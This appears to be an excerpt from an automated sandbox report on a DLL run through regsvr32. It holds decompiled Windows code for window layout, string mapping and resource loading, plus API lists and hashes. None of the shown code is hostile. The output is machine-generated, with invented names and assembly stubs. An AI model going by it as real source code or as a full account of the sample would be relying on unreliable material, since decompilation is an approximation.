                                                                                                            				intOrPtr _t206;
                                                                                                            				int _t208;
                                                                                                            				signed int _t210;
                                                                                                            				signed int _t211;
                                                                                                            				signed int _t214;
                                                                                                            				signed int _t215;
                                                                                                            				signed int _t221;
                                                                                                            				void* _t225;
                                                                                                            				intOrPtr _t233;
                                                                                                            				intOrPtr _t234;
                                                                                                            				int _t243;
                                                                                                            				signed int _t251;
                                                                                                            				signed int _t256;
                                                                                                            				long _t263;
                                                                                                            				intOrPtr _t264;
                                                                                                            				int _t273;
                                                                                                            				signed int _t280;
                                                                                                            				signed int _t287;
                                                                                                            				intOrPtr* _t297;
                                                                                                            				intOrPtr _t302;
                                                                                                            				signed int _t310;
                                                                                                            				signed int _t312;
                                                                                                            				intOrPtr _t319;
                                                                                                            				signed int _t325;
                                                                                                            				intOrPtr _t326;
                                                                                                            				signed int _t329;
                                                                                                            				int _t334;
                                                                                                            				intOrPtr* _t341;
                                                                                                            
                                                                                                            				_t297 = __ecx;
                                                                                                            				E1002F49A( &_v28, _a8, _a12);
                                                                                                            				if(IsRectEmpty(_t297 + 0xac) != 0) {
                                                                                                            					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
                                                                                                            					_t188 = _v84.right - _v84.left;
                                                                                                            					_t302 = _v84.bottom - _v84.top;
                                                                                                            				} else {
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
                                                                                                            					_t188 = _v68.right - _v68.left;
                                                                                                            					_t302 = _v68.bottom - _v68.top;
                                                                                                            				}
                                                                                                            				_t334 = 0;
                                                                                                            				_v44 = _t188;
                                                                                                            				_v40 = _t302;
                                                                                                            				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
                                                                                                            					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
                                                                                                            				} else {
                                                                                                            					_v132 = 0;
                                                                                                            				}
                                                                                                            				_t190 =  *0x1004efa0; // 0x2
                                                                                                            				_v36 =  ~_t190;
                                                                                                            				_t192 =  *0x1004efa4; // 0x2
                                                                                                            				_v32 =  ~_t192;
                                                                                                            				_v16 = _t334;
                                                                                                            				_v12 = _t334;
                                                                                                            				_v8 = _t334;
                                                                                                            				if( *(_t297 + 0x9c) <= _t334) {
                                                                                                            					L72:
                                                                                                            					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
                                                                                                            						EndDeferWindowPos(_v132);
                                                                                                            					}
                                                                                                            					SetRectEmpty( &_v100);
                                                                                                            					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
                                                                                                            					if(_a8 == _t334 || _a12 == _t334) {
                                                                                                            						if(_v28 != _t334) {
                                                                                                            							_v28 = _v28 + _v100.left - _v100.right;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_a8 == _t334 || _a12 != _t334) {
                                                                                                            						if(_v24 != _t334) {
                                                                                                            							_v24 = _v24 + _v100.top - _v100.bottom;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t198 = _a4;
                                                                                                            					 *_t198 = _v28;
                                                                                                            					 *((intOrPtr*)(_t198 + 4)) = _v24;
                                                                                                            					return _t198;
                                                                                                            				} else {
                                                                                                            					do {
                                                                                                            						_t341 = E1002CE0B(_t297, _v8);
                                                                                                            						_v20 = _t341;
                                                                                                            						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
                                                                                                            						if(_t341 == _t334) {
                                                                                                            							if(_t206 != _t334) {
                                                                                                            								goto L71;
                                                                                                            							}
                                                                                                            							L58:
                                                                                                            							_t208 = _v16;
                                                                                                            							if(_t208 != _t334) {
                                                                                                            								if(_a12 == _t334) {
                                                                                                            									_t310 = _v36 + _t208 -  *0x1004efa0;
                                                                                                            									_v36 = _t310;
                                                                                                            									if(_v28 <= _t310) {
                                                                                                            										_v28 = _t310;
                                                                                                            									}
                                                                                                            									_t210 = _v32;
                                                                                                            									if(_v24 <= _t210) {
                                                                                                            										_v24 = _t210;
                                                                                                            									}
                                                                                                            									_t211 =  *0x1004efa4; // 0x2
                                                                                                            									_v32 =  ~_t211;
                                                                                                            								} else {
                                                                                                            									_t312 = _v32 + _t208 -  *0x1004efa4;
                                                                                                            									_t214 = _v36;
                                                                                                            									_v32 = _t312;
                                                                                                            									if(_v28 <= _t214) {
                                                                                                            										_v28 = _t214;
                                                                                                            									}
                                                                                                            									if(_v24 <= _t312) {
                                                                                                            										_v24 = _t312;
                                                                                                            									}
                                                                                                            									_t215 =  *0x1004efa0; // 0x2
                                                                                                            									_v36 =  ~_t215;
                                                                                                            								}
                                                                                                            								_v16 = _t334;
                                                                                                            							}
                                                                                                            							goto L71;
                                                                                                            						}
                                                                                                            						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
                                                                                                            							L51:
                                                                                                            							if(_v12 != _t334) {
                                                                                                            								goto L71;
                                                                                                            							}
                                                                                                            							L52:
                                                                                                            							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
                                                                                                            							goto L71;
                                                                                                            						}
                                                                                                            						_t221 =  *(_t341 + 0x7c);
                                                                                                            						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
                                                                                                            							asm("sbb eax, eax");
                                                                                                            							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
                                                                                                            						} else {
                                                                                                            							_t225 = 6;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
                                                                                                            						E100086B2( &_v68, _v36, _v32, _v52, _v48);
                                                                                                            						GetWindowRect( *(_t341 + 0x1c),  &_v84);
                                                                                                            						E10028E5A(_t297,  &_v84);
                                                                                                            						if(_a12 == _t334) {
                                                                                                            							_t233 = _v84.top;
                                                                                                            							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                                                            								OffsetRect( &_v68, _t334, _t233 - _v68.top);
                                                                                                            							}
                                                                                                            							_t234 = _v68.bottom;
                                                                                                            							_t319 = _v40;
                                                                                                            							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                                                            								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
                                                                                                            								_t256 = _v32;
                                                                                                            								if(_t325 > _t256) {
                                                                                                            									_t256 = _t325;
                                                                                                            								}
                                                                                                            								OffsetRect( &_v68, _t334, _t256 - _v68.top);
                                                                                                            							}
                                                                                                            							if(_v12 == _t334) {
                                                                                                            								if(_v68.top < _v40 -  *0x1004efa4) {
                                                                                                            									goto L44;
                                                                                                            								}
                                                                                                            								_t247 = _v8;
                                                                                                            								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
                                                                                                            									goto L44;
                                                                                                            								} else {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t251 =  *0x1004efa4; // 0x2
                                                                                                            								_v12 = _t334;
                                                                                                            								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
                                                                                                            								L44:
                                                                                                            								if(EqualRect( &_v68,  &_v84) == 0) {
                                                                                                            									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										_t341 = _v20;
                                                                                                            										_t334 = 0;
                                                                                                            									}
                                                                                                            									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                                                            								}
                                                                                                            								_v32 = _v68.top -  *0x1004efa4 + _v48;
                                                                                                            								_t243 = _v52;
                                                                                                            								if(_v16 > _t243) {
                                                                                                            									goto L52;
                                                                                                            								} else {
                                                                                                            									_v16 = _t243;
                                                                                                            									goto L51;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t263 = _v84.left;
                                                                                                            							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                                                            								OffsetRect( &_v68, _t263 - _v68.left, _t334);
                                                                                                            							}
                                                                                                            							_t264 = _v68.right;
                                                                                                            							_t326 = _v44;
                                                                                                            							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
                                                                                                            								L22:
                                                                                                            								if(_v12 == _t334) {
                                                                                                            									if(_v68.left < _v44 -  *0x1004efa0) {
                                                                                                            										L27:
                                                                                                            										if(EqualRect( &_v68,  &_v84) == 0) {
                                                                                                            											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												_t341 = _v20;
                                                                                                            												_t334 = 0;
                                                                                                            											}
                                                                                                            											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                                                            										}
                                                                                                            										_v36 = _v52 -  *0x1004efa0 + _v68.left;
                                                                                                            										_t273 = _v48;
                                                                                                            										if(_v16 <= _t273) {
                                                                                                            											_v16 = _t273;
                                                                                                            										}
                                                                                                            										goto L52;
                                                                                                            									}
                                                                                                            									_t277 = _v8;
                                                                                                            									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
                                                                                                            										goto L27;
                                                                                                            									} else {
                                                                                                            										L56:
                                                                                                            										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
                                                                                                            										_v12 = 1;
                                                                                                            										goto L58;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t280 =  *0x1004efa0; // 0x2
                                                                                                            								_v12 = _t334;
                                                                                                            								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
                                                                                                            								goto L27;
                                                                                                            							} else {
                                                                                                            								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
                                                                                                            								_t287 = _v36;
                                                                                                            								if(_t329 > _t287) {
                                                                                                            									_t287 = _t329;
                                                                                                            								}
                                                                                                            								OffsetRect( &_v68, _t287 - _v68.left, _t334);
                                                                                                            								goto L22;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L71:
                                                                                                            						_v8 = _v8 + 1;
                                                                                                            					} while (_v8 <  *(_t297 + 0x9c));
                                                                                                            					goto L72;
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x1002d6eb
                                                                                                            0x1002d6f1
                                                                                                            0x00000000
                                                                                                            0x1002d397

                                                                                                            APIs
                                                                                                            • IsRectEmpty.USER32 ref: 1002D2FA
                                                                                                            • GetClientRect.USER32 ref: 1002D338
                                                                                                            • BeginDeferWindowPos.USER32 ref: 1002D365
                                                                                                            • GetWindowRect.USER32 ref: 1002D41B
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                                                            • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                                                            • EqualRect.USER32 ref: 1002D4DD
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                                                            • EqualRect.USER32 ref: 1002D5C0
                                                                                                            • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                                                            • SetRectEmpty.USER32(?), ref: 1002D717
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160784657-0
                                                                                                            • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                                                            • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                                                            				signed int _t119;
                                                                                                            				intOrPtr _t120;
                                                                                                            				int _t122;
                                                                                                            				char* _t125;
                                                                                                            				int _t132;
                                                                                                            				signed int _t134;
                                                                                                            				int _t137;
                                                                                                            				int _t138;
                                                                                                            				short* _t160;
                                                                                                            				short* _t163;
                                                                                                            				int _t164;
                                                                                                            				signed int _t165;
                                                                                                            				long _t169;
                                                                                                            				signed int _t172;
                                                                                                            				int _t181;
                                                                                                            				char* _t183;
                                                                                                            				int _t184;
                                                                                                            				signed int _t186;
                                                                                                            				int _t187;
                                                                                                            				int _t190;
                                                                                                            				void* _t192;
                                                                                                            				short* _t193;
                                                                                                            				char* _t195;
                                                                                                            				char* _t196;
                                                                                                            				signed int _t199;
                                                                                                            
                                                                                                            				_t185 = __esi;
                                                                                                            				_push(0x38);
                                                                                                            				_push(0x10042708);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t199 =  *0x1004f73c; // 0x1
                                                                                                            				if(_t199 == 0) {
                                                                                                            					_t185 = 1;
                                                                                                            					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
                                                                                                            						_t169 = GetLastError();
                                                                                                            						__eflags = _t169 - 0x78;
                                                                                                            						if(_t169 == 0x78) {
                                                                                                            							 *0x1004f73c = 2;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *0x1004f73c = 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *(_t192 + 0x14) <= 0) {
                                                                                                            					L11:
                                                                                                            					_t119 =  *0x1004f73c; // 0x1
                                                                                                            					if(_t119 == 2 || _t119 == 0) {
                                                                                                            						 *(_t192 - 0x28) = 0;
                                                                                                            						_t183 = 0;
                                                                                                            						 *(_t192 - 0x3c) = 0;
                                                                                                            						__eflags =  *(_t192 + 8);
                                                                                                            						if( *(_t192 + 8) == 0) {
                                                                                                            							_t138 =  *0x1004f724; // 0x0
                                                                                                            							 *(_t192 + 8) = _t138;
                                                                                                            						}
                                                                                                            						__eflags =  *(_t192 + 0x20);
                                                                                                            						if( *(_t192 + 0x20) == 0) {
                                                                                                            							_t137 =  *0x1004f734; // 0x0
                                                                                                            							 *(_t192 + 0x20) = _t137;
                                                                                                            						}
                                                                                                            						_t120 = E1001A444(0,  *(_t192 + 8));
                                                                                                            						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
                                                                                                            						__eflags = _t120 - 0xffffffff;
                                                                                                            						if(_t120 != 0xffffffff) {
                                                                                                            							__eflags = _t120 -  *(_t192 + 0x20);
                                                                                                            							if(__eflags == 0) {
                                                                                                            								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                                                            								L61:
                                                                                                            								__eflags =  *(_t192 - 0x28);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push( *(_t192 - 0x28));
                                                                                                            									E100107C8(0, _t183, _t186, __eflags);
                                                                                                            								}
                                                                                                            								_t122 = _t186;
                                                                                                            								goto L64;
                                                                                                            							}
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_t175 = _t192 + 0x14;
                                                                                                            							_push(_t192 + 0x14);
                                                                                                            							_push( *(_t192 + 0x10));
                                                                                                            							_push(_t120);
                                                                                                            							_push( *(_t192 + 0x20));
                                                                                                            							_t125 = E1001A487(0, _t183, _t185, __eflags);
                                                                                                            							_t195 =  &(_t193[0xc]);
                                                                                                            							 *(_t192 - 0x28) = _t125;
                                                                                                            							__eflags = _t125;
                                                                                                            							if(_t125 == 0) {
                                                                                                            								goto L46;
                                                                                                            							}
                                                                                                            							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
                                                                                                            							 *(_t192 - 0x24) = _t187;
                                                                                                            							__eflags = _t187;
                                                                                                            							if(_t187 == 0) {
                                                                                                            								_t186 =  *(_t192 - 0x48);
                                                                                                            								L58:
                                                                                                            								__eflags =  *(_t192 - 0x3c);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push(_t183);
                                                                                                            									E100107C8(0, _t183, _t186, __eflags);
                                                                                                            								}
                                                                                                            								goto L61;
                                                                                                            							}
                                                                                                            							 *(_t192 - 4) = 0;
                                                                                                            							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
                                                                                                            							 *(_t192 - 0x18) = _t195;
                                                                                                            							_t183 = _t195;
                                                                                                            							 *(_t192 - 0x44) = _t183;
                                                                                                            							E10011C50(_t183, 0, _t187);
                                                                                                            							_t196 =  &(_t195[0xc]);
                                                                                                            							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                                                            							__eflags = _t183;
                                                                                                            							if(_t183 != 0) {
                                                                                                            								L54:
                                                                                                            								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
                                                                                                            								 *(_t192 - 0x24) = _t132;
                                                                                                            								__eflags = _t132;
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push( *(_t192 + 0x1c));
                                                                                                            									_push( *(_t192 + 0x18));
                                                                                                            									_push(_t192 - 0x24);
                                                                                                            									_push(_t183);
                                                                                                            									_push( *(_t192 + 0x20));
                                                                                                            									_push( *((intOrPtr*)(_t192 - 0x40)));
                                                                                                            									_t134 = E1001A487(0, _t183, _t187, __eflags);
                                                                                                            									asm("sbb esi, esi");
                                                                                                            									_t186 =  ~( ~_t134);
                                                                                                            									goto L58;
                                                                                                            								}
                                                                                                            								goto L55;
                                                                                                            							} else {
                                                                                                            								_t183 = E100107B6( *(_t192 - 0x24));
                                                                                                            								__eflags = _t183;
                                                                                                            								if(_t183 == 0) {
                                                                                                            									L55:
                                                                                                            									_t186 = 0;
                                                                                                            									goto L58;
                                                                                                            								}
                                                                                                            								E10011C50(_t183, 0,  *(_t192 - 0x24));
                                                                                                            								_t196 =  &(_t196[0xc]);
                                                                                                            								 *(_t192 - 0x3c) = 1;
                                                                                                            								goto L54;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							goto L46;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(_t119 != 1) {
                                                                                                            							L46:
                                                                                                            							_t122 = 0;
                                                                                                            							L64:
                                                                                                            							return E1001254F(_t122);
                                                                                                            						}
                                                                                                            						_t184 = 0;
                                                                                                            						 *(_t192 - 0x2c) = 0;
                                                                                                            						 *(_t192 - 0x38) = 0;
                                                                                                            						 *(_t192 - 0x34) = 0;
                                                                                                            						if( *(_t192 + 0x20) == 0) {
                                                                                                            							_t164 =  *0x1004f734; // 0x0
                                                                                                            							 *(_t192 + 0x20) = _t164;
                                                                                                            						}
                                                                                                            						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
                                                                                                            						 *(_t192 - 0x30) = _t190;
                                                                                                            						if(_t190 == 0) {
                                                                                                            							goto L46;
                                                                                                            						} else {
                                                                                                            							 *(_t192 - 4) = 1;
                                                                                                            							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
                                                                                                            							 *(_t192 - 0x18) = _t193;
                                                                                                            							 *(_t192 - 0x1c) = _t193;
                                                                                                            							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                                                            							if( *(_t192 - 0x1c) != 0) {
                                                                                                            								L21:
                                                                                                            								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
                                                                                                            									L36:
                                                                                                            									_t219 =  *(_t192 - 0x34);
                                                                                                            									if( *(_t192 - 0x34) != 0) {
                                                                                                            										_push( *(_t192 - 0x20));
                                                                                                            										E100107C8(0, _t184, _t190, _t219);
                                                                                                            									}
                                                                                                            									_t220 =  *(_t192 - 0x38);
                                                                                                            									if( *(_t192 - 0x38) != 0) {
                                                                                                            										_push( *(_t192 - 0x1c));
                                                                                                            										E100107C8(0, _t184, _t190, _t220);
                                                                                                            									}
                                                                                                            									_t122 = _t184;
                                                                                                            									goto L64;
                                                                                                            								}
                                                                                                            								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
                                                                                                            								 *(_t192 - 0x2c) = _t184;
                                                                                                            								if(_t184 == 0) {
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
                                                                                                            									 *(_t192 - 4) = 2;
                                                                                                            									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
                                                                                                            									 *(_t192 - 0x18) = _t193;
                                                                                                            									 *(_t192 - 0x20) = _t193;
                                                                                                            									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                                                            									__eflags =  *(_t192 - 0x20);
                                                                                                            									if( *(_t192 - 0x20) != 0) {
                                                                                                            										L31:
                                                                                                            										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
                                                                                                            										if(__eflags != 0) {
                                                                                                            											_push(0);
                                                                                                            											_push(0);
                                                                                                            											__eflags =  *(_t192 + 0x1c);
                                                                                                            											if(__eflags != 0) {
                                                                                                            												_push( *(_t192 + 0x1c));
                                                                                                            												_push( *(_t192 + 0x18));
                                                                                                            											} else {
                                                                                                            												_push(0);
                                                                                                            												_push(0);
                                                                                                            											}
                                                                                                            											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
                                                                                                            										}
                                                                                                            										goto L36;
                                                                                                            									} else {
                                                                                                            										_t160 = E100107B6(_t184 + _t184);
                                                                                                            										 *(_t192 - 0x20) = _t160;
                                                                                                            										__eflags = _t160;
                                                                                                            										if(__eflags == 0) {
                                                                                                            											goto L36;
                                                                                                            										}
                                                                                                            										 *(_t192 - 0x34) = 1;
                                                                                                            										goto L31;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
                                                                                                            									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                                                            								}
                                                                                                            								goto L36;
                                                                                                            							} else {
                                                                                                            								_t163 = E100107B6(_t190 + _t190);
                                                                                                            								_pop(_t172);
                                                                                                            								 *(_t192 - 0x1c) = _t163;
                                                                                                            								if(_t163 == 0) {
                                                                                                            									goto L46;
                                                                                                            								}
                                                                                                            								 *(_t192 - 0x38) = 1;
                                                                                                            								goto L21;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t181 =  *(_t192 + 0x14);
                                                                                                            				_t165 =  *(_t192 + 0x10);
                                                                                                            				while(1) {
                                                                                                            					_t172 = _t181 - 1;
                                                                                                            					if( *_t165 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t165 = _t165 + 1;
                                                                                                            					if(_t172 != 0) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					_t172 = _t172 | 0xffffffff;
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
                                                                                                            				goto L11;
                                                                                                            			}




























                                                                                                            0x1001829c
                                                                                                            0x1001829d
                                                                                                            0x1001829d
                                                                                                            0x100182b4
                                                                                                            0x100182b4
                                                                                                            0x00000000
                                                                                                            0x10018265
                                                                                                            0x10018269
                                                                                                            0x1001826f
                                                                                                            0x10018272
                                                                                                            0x10018274
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x10018263
                                                                                                            0x100181f8
                                                                                                            0x10018217
                                                                                                            0x10018217
                                                                                                            0x00000000
                                                                                                            0x10018197
                                                                                                            0x1001819b
                                                                                                            0x100181a0
                                                                                                            0x100181a1
                                                                                                            0x100181a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x10018195
                                                                                                            0x1001814e
                                                                                                            0x100180f7
                                                                                                            0x100180d4
                                                                                                            0x100180d7
                                                                                                            0x100180da
                                                                                                            0x100180da
                                                                                                            0x100180dd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180df
                                                                                                            0x100180e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x100180ec
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                                                            • GetLastError.KERNEL32 ref: 100180BA
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1775797328-4125583295
                                                                                                            • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                                                            • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v20;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t53;
                                                                                                            				void* _t54;
                                                                                                            				signed int _t56;
                                                                                                            				struct HDC__* _t65;
                                                                                                            				struct HBITMAP__* _t66;
                                                                                                            				struct HDC__* _t70;
                                                                                                            				void* _t78;
                                                                                                            				int* _t80;
                                                                                                            				int _t81;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t89;
                                                                                                            				void* _t102;
                                                                                                            				struct HDC__* _t103;
                                                                                                            				BITMAPINFO* _t105;
                                                                                                            
                                                                                                            				_t53 = LoadResource(_a4, _a8);
                                                                                                            				_v20 = _t53;
                                                                                                            				if(_t53 == 0) {
                                                                                                            					return _t53;
                                                                                                            				}
                                                                                                            				_t54 = LockResource(_t53);
